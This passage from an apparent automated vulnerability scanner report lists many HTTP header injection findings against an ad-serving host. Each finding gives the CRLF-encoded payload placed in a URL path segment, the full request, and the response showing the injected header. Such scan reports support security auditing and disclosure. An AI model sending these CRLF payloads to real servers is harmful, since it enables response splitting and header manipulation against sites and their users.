User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9a409
b939bb21da4/N4270.154361.33ACROSS.COM/B4882358.3;sz=300x250;click=http: //ad.yieldmanager.com/clk
Date: Mon, 22 Nov 2010 23:14:10 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.17. http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4390.aod-invite.comOX15921/B4977097.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 85615%0d%0a6f33afcacc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /85615%0d%0a6f33afcacc/N4390.aod-invite.comOX15921/B4977097.2 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/85615
6f33afcacc/N4390.aod-invite.comOX15921/B4977097.2:
Date: Mon, 22 Nov 2010 23:35:49 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.18. http://vulnerable.ad.partner/adi/N4441.247realmedia.com/B4724284.4 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4441.247realmedia.com/B4724284.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9435f%0d%0a682527d3f79 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9435f%0d%0a682527d3f79/N4441.247realmedia.com/B4724284.4 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9435f
682527d3f79/N4441.247realmedia.com/B4724284.4:
Date: Tue, 23 Nov 2010 00:05:03 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.19. http://vulnerable.ad.partner/adi/N6092.cadreon/B4547499.16 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N6092.cadreon/B4547499.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3b642%0d%0a2a545aea59 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3b642%0d%0a2a545aea59/N6092.cadreon/B4547499.16 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3b642
2a545aea59/N6092.cadreon/B4547499.16:
Date: Tue, 23 Nov 2010 00:05:03 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.20. http://vulnerable.ad.partner/adi/N6092.cadreon/B4547499.18 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N6092.cadreon/B4547499.18

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 34621%0d%0a39037eb6c7d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /34621%0d%0a39037eb6c7d/N6092.cadreon/B4547499.18 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/34621
39037eb6c7d/N6092.cadreon/B4547499.18:
Date: Tue, 23 Nov 2010 00:05:03 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.21. http://vulnerable.ad.partner/adj/N1558.154361.9712890756521/B4473299.3 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adj/N1558.154361.9712890756521/B4473299.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 295a2%0d%0ad9172253edc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /295a2%0d%0ad9172253edc/N1558.154361.9712890756521/B4473299.3 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/295a2
d9172253edc/N1558.154361.9712890756521/B4473299.3:
Date: Mon, 22 Nov 2010 23:35:50 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.22. http://vulnerable.ad.partner/adj/N2998.159462.7724395940621/B4640859.11 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adj/N2998.159462.7724395940621/B4640859.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 72b9a%0d%0ad8293e1a1f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /72b9a%0d%0ad8293e1a1f9/N2998.159462.7724395940621/B4640859.11 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/72b9a
d8293e1a1f9/N2998.159462.7724395940621/B4640859.11:
Date: Mon, 22 Nov 2010 23:35:51 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.23. http://vulnerable.ad.partner/adj/N2998.159462.7724395940621/B4640859.9 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adj/N2998.159462.7724395940621/B4640859.9

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 32d2f%0d%0abb71fbe79d2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /32d2f%0d%0abb71fbe79d2/N2998.159462.7724395940621/B4640859.9 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/32d2f
bb71fbe79d2/N2998.159462.7724395940621/B4640859.9:
Date: Mon, 22 Nov 2010 23:35:50 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.24. http://vulnerable.ad.partner/adj/N2998.bizo.comOX15981/B4855853.26 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adj/N2998.bizo.comOX15981/B4855853.26

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1d83f%0d%0af415c499d89 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1d83f%0d%0af415c499d89/N2998.bizo.comOX15981/B4855853.26 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1d83f
f415c499d89/N2998.bizo.comOX15981/B4855853.26:
Date: Mon, 22 Nov 2010 23:35:52 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.25. http://vulnerable.ad.partner/adj/N2998.bizo.comOX15981/B4855853.28 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adj/N2998.bizo.comOX15981/B4855853.28

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 63776%0d%0a3601104994e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /63776%0d%0a3601104994e/N2998.bizo.comOX15981/B4855853.28 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/63776
3601104994e/N2998.bizo.comOX15981/B4855853.28:
Date: Mon, 22 Nov 2010 23:35:50 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.26. http://vulnerable.ad.partner/adj/N3175.272756.AOL-ADVERTISING2/B4640114.4 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adj/N3175.272756.AOL-ADVERTISING2/B4640114.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 87ee6%0d%0a4e6ead1aa4b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /87ee6%0d%0a4e6ead1aa4b/N3175.272756.AOL-ADVERTISING2/B4640114.4 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/87ee6
4e6ead1aa4b/N3175.272756.AOL-ADVERTISING2/B4640114.4:
Date: Tue, 23 Nov 2010 00:05:02 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.27. http://vulnerable.ad.partner/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 54652%0d%0acb82cb80806 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /54652%0d%0acb82cb80806/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1.ace.advertising.com/click/site=0000782316/mnum=0000884206/cstr=64955592=_4ceaf84f,3347454320,782316%5E884206%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=64955592/optn=64?trg=;ord=3347454320? HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/54652
cb82cb80806/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http: //r1.ace.advertising.com/click/site=0000782316/mnum=0000884206/cstr=64955592=_4ceaf84f,3347454320,782316^884206^1183^0,1_/xsxdata=$xsxdata/bnum=64955592/optn%3D64
Date: Mon, 22 Nov 2010 23:10:42 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.28. http://vulnerable.ad.partner/adj/N4441.247realmedia.com/B4724284.4 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adj/N4441.247realmedia.com/B4724284.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 756e8%0d%0aa2d80bc7b52 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /756e8%0d%0aa2d80bc7b52/N4441.247realmedia.com/B4724284.4 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/756e8
a2d80bc7b52/N4441.247realmedia.com/B4724284.4:
Date: Tue, 23 Nov 2010 00:05:02 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.29. http://vulnerable.ad.partner/adj/N5687.135388.BIZO/B4978163.5 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adj/N5687.135388.BIZO/B4978163.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12992%0d%0a14b3591fab6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /12992%0d%0a14b3591fab6/N5687.135388.BIZO/B4978163.5;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/7/177/%2a/m%3B232091143%3B0-0%3B0%3B56016540%3B3454-728/90%3B39135168/39152925/1%3Bu%3D%2Cbzo-7966774_1290467750%2C11bbcecf1d09b9d%2Cnone%2C%3B~sscs%3D%3fhttp://ib.adnxs.com/click/yDzyBwNP9z9O0CaHT_r0PwAAAGBmZv4_mpmZuUfhFEAAAABAMzMXQEeCYgow0o1P20-els-vlAih-epMAAAAAK7tAADLAQAA6AAAAAIAAADa3gEAAQAAAFVTRABVU0QA2AJaAKAGiQM-CQEBBQIEAAAAAAAsI5tO/cnd=!fCj6Bwj-6gEQ2r0HGIECIMsBKIkHMTMzMzMzMxdAQhMIABAAGAAgASj-__________8BQhQIvzoQABgAIAMo_v__________AUIUCL86EAAYACACKP7__________wFIAFAAWKAN/referrer=http%3A%2F%2Fwww.smh.com.au/clickenc=;ord=997492? HTTP/1.1
Host: vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=yDzyBwNP9z9O0CaHT_r0PwAAAGBmZv4_mpmZuUfhFEAAAABAMzMXQEeCYgow0o1P20-els-vlAih-epMAAAAAK7tAADLAQAA6AAAAAIAAADa3gEAAQAAAFVTRABVU0QA2AJaAKAGiQM-CQECBQIEAAAAAAAtI6hO&tt_code=vert-15&udj=uf%28%27a%27%2C+1749%2C+1290467745%29%3Buf%28%27c%27%2C+30078%2C+1290467745%29%3Buf%28%27r%27%2C+122586%2C+1290467745%29%3Bppv%287487%2C+%275732469004487000647%27%2C+1290467745%2C+1290554145%2C+30078%2C+203%29%3B&cnd=!fCj6Bwj-6gEQ2r0HGIECIMsBKIkHMTMzMzMzMxdAQhMIABAAGAAgASj-__________8BQhQIvzoQABgAIAMo_v__________AUIUCL86EAAYACACKP7__________wFIAFAAWKAN&referrer=http://www.smh.com.au
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/12992
14b3591fab6/N5687.135388.BIZO/B4978163.5;sz=728x90;click=http: //vulnerable.ad.partner/click;h=v8/3a5a/7/177/*/m;232091143;0-0;0;56016540;3454-728/90;39135168/39152925/1%3Bu%3D%2Cbzo-7966774_1290467750%2C11bbcecf1d09b9d%2Cnone%2C%3B%7Esscs%3D
Date: Mon, 22 Nov 2010 23:17:23 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.30. http://vulnerable.ad.partner/adj/N6296.272756.AOL/B4828572.307 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adj/N6296.272756.AOL/B4828572.307

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 88955%0d%0ac12184852be was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /88955%0d%0ac12184852be/N6296.272756.AOL/B4828572.307 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/88955
c12184852be/N6296.272756.AOL/B4828572.307:
Date: Tue, 23 Nov 2010 00:05:02 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.31. http://vulnerable.ad.partner/adj/N6296.272756.AOL/B4828572.309 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adj/N6296.272756.AOL/B4828572.309

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1f3be%0d%0aca21dcd7a94 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1f3be%0d%0aca21dcd7a94/N6296.272756.AOL/B4828572.309;sz=300x250;click=http://r1.ace.advertising.com/click/site=0000782315/mnum=0000917250/cstr=99348528=_4ceaf84b,6745566828,782315%5E917250%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=99348528/optn=64?trg=;ord=6745566828? HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1f3be
ca21dcd7a94/N6296.272756.AOL/B4828572.309;sz=300x250;click=http: //r1.ace.advertising.com/click/site=0000782315/mnum=0000917250/cstr=99348528=_4ceaf84b,6745566828,782315^917250^1183^0,1_/xsxdata=$xsxdata/bnum=99348528/optn%3D64
Date: Mon, 22 Nov 2010 23:10:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.32. http://vulnerable.ad.partner/adj/bzo.361/L12_4858519 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adj/bzo.361/L12_4858519

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22667%0d%0a7d576c97500 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22667%0d%0a7d576c97500/bzo.361/L12_4858519 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/22667
7d576c97500/bzo.361/L12_4858519:
Date: Tue, 23 Nov 2010 00:18:09 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.33. http://vulnerable.ad.partner/adj/bzo.361/L2_4985265 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adj/bzo.361/L2_4985265

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 221b4%0d%0a11c7772ac93 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

